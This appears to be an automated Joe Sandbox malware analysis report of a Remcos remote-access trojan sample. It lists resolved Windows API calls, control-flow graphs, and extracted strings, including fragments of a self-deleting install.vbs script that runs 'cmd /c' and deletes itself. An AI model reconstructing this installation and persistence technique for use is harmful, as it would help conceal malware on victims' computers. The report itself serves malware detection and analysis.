40b9d9 CopyFileW 45200->45205 45203->45184 45204 40ba3b SetFileAttributesW 45203->45204 45204->45184 45205->45176 45208 40b9e6 45205->45208 45206 40b9a5 45209 401ee9 11 API calls 45206->45209 45207 401ee9 11 API calls 45210 40ba6d 45207->45210 45208->45177 45211 40b9ae 45209->45211 45212 40415e 28 API calls 45210->45212 45213 401ee9 11 API calls 45211->45213 45215 40ba7b 45212->45215 45213->45193 45214 40bb46 45216 40415e 28 API calls 45214->45216 45215->45214 45217 40415e 28 API calls 45215->45217 45219 40bb55 45216->45219 45218 40bab4 45217->45218 45220 40415e 28 API calls 45218->45220 45221 40415e 28 API calls 45219->45221 45222 40bac7 45220->45222 45223 40bb65 45221->45223 45224 402ff4 28 API calls 45222->45224 45543 4042fd 45223->45543 45226 40bad5 45224->45226 45228 402f85 28 API calls 45226->45228 45231 40bae4 45228->45231 45229 402f85 28 API calls 45230 40bb82 45229->45230 45232 402ff4 28 API calls 45230->45232 45233 402ff4 28 API calls 45231->45233 45234 40bb91 45232->45234 45235 40baf0 45233->45235 45548 40323d 45234->45548 45237 402ff4 28 API calls 45235->45237 45239 40bafc 45237->45239 45241 40323d 28 API calls 45239->45241 45240 401ee9 11 API calls 45242 40bba8 45240->45242 45243 40bb07 45241->45243 45244 401ee9 11 API calls 45242->45244 45245 401ee9 11 API calls 45243->45245 45246 40bbb4 45244->45246 45247 40bb10 45245->45247 45248 401ee9 11 API calls 45246->45248 45249 401ee9 11 API calls 45247->45249 45251 40bbc0 45248->45251 45250 40bb19 45249->45250 45252 401ee9 11 API calls 45250->45252 45253 401ee9 11 API calls 45251->45253 45254 40bb22 45252->45254 45255 40bbc9 45253->45255 45256 401ee9 11 API calls 45254->45256 45257 401ee9 11 API calls 45255->45257 45258 40bb2e 45256->45258 45262 40bbd2 45257->45262 45259 401ee9 11 API calls 45258->45259 45260 40bb3a 45259->45260 45261 401ee9 11 API calls 45260->45261 45261->45214 45552 41a17b 45262->45552 45264 40bc0c 45265 40bc3c 45264->45265 45267 40bc23 ShellExecuteW 45264->45267 45266 401ee9 11 API calls 45265->45266 45268 40bc45 45266->45268 45267->45265 45270 40bc35 ExitProcess 45267->45270 45269 401ee9 11 API calls 45268->45269 45269->45177 45271->44725 45272->44732 45273->44737 45275->44762 45276->44808 45277->44781 45278->44871 45280 402232 11 API calls 45279->45280 45281 401ef2 45280->45281 45281->44835 45282->44880 45283->44893 45284->44769 45286 41210e RegQueryValueExA RegCloseKey 45285->45286 45287 412132 45285->45287 45286->45287 45287->44813 45289 40207b 45288->45289 45290 4023ae 11 API calls 45289->45290 45291 402086 45290->45291 45601 4024cd 45291->45601 45294->44830 45295->44837 45296->44844 45297->44852 45298->44882 45299->44894 45300->44931 45301->44935 45302->44943 45303->44919 45304->44924 45305->44927 45306->44786 45605 418ccd 102 API calls 45309->45605 45311 4194b0 LoadResource LockResource SizeofResource 45310->45311 45312 40dd9e 45310->45312 45311->45312 45312->44975 45314 40209f 45313->45314 45322 4023ae 45314->45322 45316 4020aa 45326 4024ea 45316->45326 45318 4020b9 45318->44979 45320 402097 28 API calls 45319->45320 45321 406302 45320->45321 45321->44986 45323 402408 45322->45323 45324 4023b8 45322->45324 45323->45316 45324->45323 45333 402787 11 API calls std::_Deallocate 45324->45333 45327 4024fa 45326->45327 45328 402500 45327->45328 45329 402515 45327->45329 45334 402549 45328->45334 45344 4028c8 28 API calls 45329->45344 45332 402513 45332->45318 45333->45323 45345 402868 45334->45345 45336 40255d 45337 402572 45336->45337 45338 402587 45336->45338 45350 402a14 22 API calls 45337->45350 45352 4028c8 28 API calls 45338->45352 45341 40257b 45351 4029ba 22 API calls 45341->45351 45343 402585 45343->45332 45344->45332 45346 402870 45345->45346 45347 402878 45346->45347 45353 402c83 22 API calls 45346->45353 45347->45336 45350->45341 45351->45343 45352->45343 45355 4020c7 45354->45355 45356 4023ae 11 API calls 45355->45356 45357 4020d2 45356->45357 45357->45014 45358->45014 45360 41aba7 45359->45360 45361 41ac06 45360->45361 45365 41abb7 45360->45365 45362 41ac20 45361->45362 45363 41ad46 28 API calls 45361->45363 45380 41aec3 28 API calls 45362->45380 45363->45362 45366 41abef 45365->45366 45371 41ad46 45365->45371 45379 41aec3 28 API calls 45366->45379 45367 41ac02 45367->45014 45370->45004 45373 41ad4e 45371->45373 45372 41ad80 45372->45366 45373->45372 45374 41ad84 45373->45374 45377 41ad68 45373->45377 45391 402705 22 API calls 45374->45391 45381 41adb7 45377->45381 45379->45367 45380->45367 45382 41adc1 __EH_prolog 45381->45382 45392 4026f7 22 API calls 45382->45392 45384 41add4 45393 41aeda 11 API calls 45384->45393 45386 41ae32 45386->45372 45387 41adfa 45387->45386 45394 402710 11 API calls 45387->45394 45389 41ae19 45395 4026f2 11 API calls std::_Deallocate 45389->45395 45392->45384 45393->45387 45394->45389 45395->45386 45396->45018 45397->45023 45398->45021 45401 40328a 45400->45401 45403 4032a9 45401->45403 45404 4028c8 28 API calls 45401->45404 45403->45034 45404->45403 45406 4051db 45405->45406 45415 405254 45406->45415 45408 4051e8 45408->45037 45410 402041 45409->45410 45411 4023ae 11 API calls 45410->45411 45412 40205b 45411->45412 45420 40265a 45412->45420 45416 405262 45415->45416 45419 402884 22 API calls 45416->45419 45421 40266b 45420->45421 45422 4023ae 11 API calls 45421->45422 45423 40206d 45422->45423 45423->45040 45424->45048 45425->45053 45427 419f30 GetCurrentProcess IsWow64Process 45426->45427 45428 4192bc 45426->45428 45427->45428 45429 419f47 45427->45429 45430 411f91 RegOpenKeyExA 45428->45430 45429->45428 45431 411fbf RegQueryValueExA RegCloseKey 45430->45431 45432 411fe9 45430->45432 45431->45432 45433 402073 28 API calls 45432->45433 45434 411ffe 45433->45434 45434->45069 45435->45077 45436->45090 45437->45092 45439 401f6e 45438->45439 45462 402232 45439->45462 45441 401f79 45441->45099 45441->45100 45441->45101 45443 404166 45442->45443 45444 402232 11 API calls 45443->45444 45445 404171 45444->45445 45467 40419c 45445->45467 45448->45105 45449->45113 45455 402f94 45450->45455 45451 402fd6 45487 40321f 45451->45487 45453 402fd4 45480 403242 45453->45480 45455->45451 45457 402fcb 45455->45457 45486 4031f1 28 API calls 45457->45486 45459 401ef3 28 API calls 45459->45139 45460->45138 45461->45121 45463 40228c 45462->45463 45464 40223c 45462->45464 45463->45441 45464->45463 45466 402759 11 API calls std::_Deallocate 45464->45466 45466->45463 45468 4041a8 45467->45468 45471 4041b9 45468->45471 45470 40417c 45470->45114 45472 4041c9 45471->45472 45473 4041e6 45472->45473 45474 4041cf 45472->45474 45479 4027c6 28 API calls 45473->45479 45478 404247 28 API calls 45474->45478 45477 4041e4 45477->45470 45478->45477 45479->45477 45481 40324e 45480->45481 45482 402232 11 API calls 45481->45482 45483 403268 45482->45483 45490 402316 45483->45490 45486->45453 45494 403686 45487->45494 45489 40322c 45489->45453 45491 402327 45490->45491 45492 402232 11 API calls 45491->45492 45493 4023a7 45492->45493 45493->45459 45495 402868 22 API calls 45494->45495 45496 403699 45495->45496 45497 40370c 45496->45497 45498 4036be 45496->45498 45504 402884 22 API calls 45497->45504 45502 4036d0 45498->45502 45503 4027c6 28 API calls 45498->45503 45502->45489 45503->45502 45506 401f66 11 API calls 45505->45506 45507 4081d3 45506->45507 45566 40312c 45507->45566 45509 4081f0 45510 40323d 28 API calls 45509->45510 45511 4081f8 45510->45511 45511->45164 45513 40b7e3 45512->45513 45514 40b7a5 45512->45514 45516 40b826 45513->45516 45519 40a8cc 28 API calls 45513->45519 45571 40a8cc 45514->45571 45518 40b869 45516->45518 45521 40a8cc 28 API calls 45516->45521 45518->45183 45518->45184 45522 40b7fc 45519->45522 45520 402ff4 28 API calls 45523 40b7c3 45520->45523 45524 40b83f 45521->45524 45525 402ff4 28 API calls 45522->45525 45578 412204 RegCreateKeyW 45523->45578 45528 402ff4 28 API calls 45524->45528 45526 40b806 45525->45526 45529 412204 14 API calls 45526->45529 45531 40b849 45528->45531 45532 40b81a 45529->45532 45534 412204 14 API calls 45531->45534 45535 401ee9 11 API calls 45532->45535 45533 401ee9 11 API calls 45533->45513 45536 40b85d 45534->45536 45535->45516 45537 401ee9 11 API calls 45536->45537 45537->45518 45584 403202 45538->45584 45540 403002 45541 403242 11 API calls 45540->45541 45542 403011 45541->45542 45542->45207 45544 40321f 28 API calls 45543->45544 45545 40430b 45544->45545 45546 403242 11 API calls 45545->45546 45547 40431a 45546->45547 45547->45229 45549 40321f 45548->45549 45550 403686 28 API calls 45549->45550 45551 40322c 45550->45551 45551->45240 45553 41a18e CreateFileW 45552->45553 45555 41a1c7 45553->45555 45556 41a1cb 45553->45556 45555->45264 45557 41a1d2 SetFilePointer 45556->45557 45558 41a1eb WriteFile 45556->45558 45557->45558 45559 41a1e2 CloseHandle 45557->45559 45560 41a200 CloseHandle 45558->45560 45561 41a1fe 45558->45561 45559->45555 45560->45555 45561->45560 45562->45169 45563->45163 45564->45206 45565->45193 45568 403136 45566->45568 45567 403155 45567->45509 45568->45567 45570 4027c6 28 API calls 45568->45570 45570->45567 45572 401f66 11 API calls 45571->45572 45573 40a8d8 45572->45573 45574 40312c 28 API calls 45573->45574 45575 40a8f4 45574->45575 45576 40323d 28 API calls 45575->45576 45577 40a907 45576->45577 45577->45520 45579 412257 45578->45579 45581 412219 45578->45581 45580 401ee9 11 API calls 45579->45580 45582 40b7d7 45580->45582 45583 412232 RegSetValueExW RegCloseKey 45581->45583 45582->45533 45583->45579 45585 40320e 45584->45585 45588 4035f8 45585->45588 45587 40321b 45587->45540 45589 403606 45588->45589 45590 403624 45589->45590 45591 40360c 45589->45591 45593 40363c 45590->45593 45594 40367e 45590->45594 45592 403686 28 API calls 45591->45592 45598 403622 45592->45598 45593->45598 45599 4027c6 28 API calls 45593->45599 45600 402884 22 API calls 45594->45600 45598->45587 45599->45598 45602 4024d9 45601->45602 45603 4024ea 28 API calls 45602->45603 45604 402091 45603->45604 45604->44826 45613 411253 58 API calls 45609->45613

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                • API String ID: 551388010-2474455403
                                • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c0 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 98 40d5c5-40d5c9 70->98 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 99 40d622-40d63f call 401f8b call 411f34 81->99 100 40d60f-40d61c WaitForSingleObject CloseHandle 81->100 108 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->108 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 106 40d6b0-40d6b4 95->106 107 40d6a9-40d6ab 95->107 98->71 103 40dd0f-40dd27 call 401f8b call 41239a call 410eda 98->103 122 40d651 99->122 123 40d641-40d650 call 401f8b call 41239a 99->123 100->99 136 40dd2c 103->136 112 40d6b6-40d6c9 call 401e45 call 401f8b 106->112 113 40d717-40d72a call 401e45 call 401f8b 106->113 107->106 179 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 108->179 112->113 140 40d6cb-40d6d1 112->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 113->142 143 40d72c call 40e501 113->143 122->80 123->122 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->113 147 40d6d3-40d6d9 140->147 188 40dd6a-40dd6f call 413980 141->188 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 152 40d6f7-40d710 call 401f8b call 411eea 147->152 153 40d6db-40d6ee call 4060ea 147->153 152->113 178 40d712 call 4066a6 152->178 153->113 169 40d6f0 call 4067a0 153->169 175 40d6f5 169->175 175->113 178->113 221 40da61-40da63 179->221 222 40da65-40da67 179->222 216->108 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d7f6 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed 217->250 227 40d8a7-40d8b1 call 408093 220->227 228 40d828-40d89a call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->228 223 40da6b-40da7c call 41aa4f CreateThread 221->223 224 40da69 222->224 225 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->225 223->225 224->223 349 40db83-40db9a call 401e45 call 401f8b 225->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 225->350 237 40d8b6-40d8de call 40245c call 43254d 227->237 316 40d89f-40d8a5 228->316 257 40d8f0 237->257 258 40d8e0-40d8ee call 434c30 237->258 292 40d7fb-40d810 call 401ef3 call 401ee9 250->292 260 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 257->260 258->260 260->179 332 40d96d-40d98c call 401e45 call 419bca call 40de34 260->332 292->216 316->237 332->179 346 40d98e-40d990 332->346 346->90 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 360->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->372 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 405 40dcc1 384->405 406 40dcc4-40dcd7 CreateThread 384->406 405->406 410 40dce5-40dcec 406->410 411 40dcd9-40dce3 CreateThread 406->411 412 40dcfa-40dd01 410->412 413 40dcee-40dcf8 CreateThread 410->413 411->410 412->136 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->141
                                APIs
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                  • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                  • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                  • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                  • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                • String ID: (#G$@8T$Access Level: $Administrator$Attempt-S4A0CI$C:\Users\user\Desktop\DB5rQYsfd6.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$h5S$licence$license_code.txt$origmsc
                                • API String ID: 1529173511-3130601473
                                • Opcode ID: 2ed733684bd5ca056eb8e9b7aa60f0ddb74596f8e79d911b33316d383e3c192b
                                • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                • Opcode Fuzzy Hash: 2ed733684bd5ca056eb8e9b7aa60f0ddb74596f8e79d911b33316d383e3c192b
                                • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 420 40b871-40b88f call 439891 423 40b891-40b8b4 call 401ee4 CreateDirectoryW call 4081c7 420->423 424 40b8e2-40b905 call 40c5ed call 401ef3 420->424 432 40b8b9-40b8e0 call 402ff4 call 401ef3 call 401ee9 423->432 433 40b909-40b925 call 401ee9 call 401ee4 call 439f5d 424->433 432->433 446 40b941-40b956 call 401ee4 CopyFileW 433->446 447 40b927-40b93c call 401ee4 call 40b77f 433->447 453 40b9f5-40ba10 call 401ee4 call 40b77f 446->453 454 40b95c-40b961 446->454 458 40bc4e-40bc58 447->458 466 40ba12-40ba2d call 401ee4 SetFileAttributesW call 439891 453->466 467 40ba3e-40ba96 call 439e5f call 40415e call 402ff4 call 401ee9 call 40415e call 40808e 453->467 454->453 457 40b967-40b977 call 439891 454->457 464 40b9b9-40b9c2 call 40c5ed call 401ef3 457->464 465 40b979-40b9b7 call 40c5ed call 402ff4 * 2 call 401ef3 call 401ee9 * 2 457->465 480 40b9c7-40b9e4 call 401ee9 call 401ee4 CopyFileW 464->480 465->480 466->467 488 40ba2f-40ba3c call 401ee4 SetFileAttributesW 466->488 510 40bb46-40bc10 call 40415e * 2 call 4042fd call 402f85 call 402ff4 call 40323d call 401ee9 * 5 call 40808e call 401ee4 call 40245c call 401ee4 call 41a17b 467->510 511 40ba9c-40bb41 call 40415e * 2 call 402ff4 call 402f85 call 402ff4 * 2 call 40323d call 401ee9 * 6 467->511 480->453 498 40b9e6-40b9f0 call 408093 480->498 488->467 498->458 569 40bc12-40bc33 call 401ee4 ShellExecuteW 510->569 570 40bc3c-40bc49 call 401ee9 * 2 510->570 511->510 569->570 576 40bc35-40bc36 ExitProcess 569->576 570->458
                                APIs
                                • _wcslen.LIBCMT ref: 0040B882
                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                • CopyFileW.KERNELBASE(C:\Users\user\Desktop\DB5rQYsfd6.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                • _wcslen.LIBCMT ref: 0040B968
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\DB5rQYsfd6.exe,00000000,00000000,00000000), ref: 0040B9E0
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                • _wcslen.LIBCMT ref: 0040BA25
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                • ExitProcess.KERNEL32 ref: 0040BC36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                • String ID: """, 0$$.F$6$C:\Users\user\Desktop\DB5rQYsfd6.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$h5S$open$t<F
                                • API String ID: 2743683619-2476706462
                                • Opcode ID: 55d877feadc99f119a9894dd19d5bd17b3ca3ecbbde1c983e34bc6ef620285c2
                                • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                • Opcode Fuzzy Hash: 55d877feadc99f119a9894dd19d5bd17b3ca3ecbbde1c983e34bc6ef620285c2
                                • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

                                Control-flow Graph

                                APIs
                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                Strings
